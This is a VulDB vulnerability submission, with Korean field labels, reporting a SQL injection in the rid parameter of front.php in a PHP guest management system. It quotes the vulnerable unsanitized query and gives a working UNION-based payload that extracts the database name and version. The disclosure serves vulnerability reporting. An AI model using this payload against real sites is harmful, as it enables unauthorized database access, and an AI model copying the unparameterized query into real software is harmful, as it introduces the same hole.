| 제목 | There is a SQL injection vulnerability in the guest management system. |
|---|
| 설명 | There is a SQL injection vulnerability in the visitor management system, which does not check the query content entered by the user. The input content is controllable by the user, and the user can construct a malicious payload to attack the website.
Vulnerability file location: / guestmanagement / front.php
look at this source code
```
if(isset($_GET['rid'])){
$showResultFor = $_ GET['rid'];
}
$query = "SELECT * FROM info_visitor WHERE ReceiptID = '$showResultFor' AND Status = 'ONLINE' ";
```
There is no protection for $rid here. Malicious data can be constructed here to attack the website database.
The construction statement is as follows
```
? rid=0' union select 1,database(),3,@@version,5,6,7,8,9,10,11,12,13,14,15,16--+
```
https://s1.ax1x.com/2022/08/13/vtDZfe.png
Source link
https://www.sourcecodester.com/php/14664/guest-management-system-php-full-source-code.html |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/14664/guest-management-system-php-full-source-code.html/ |
|---|
| 사용자 | qidian (UID 30810) |
|---|
| 제출 | 2022. 08. 16. AM 01:03 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 08. 16. PM 03:56 (15 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 206489 [SourceCodester Guest Management System front.php rid SQL 주입] |
|---|
| 포인트들 | 20 |
|---|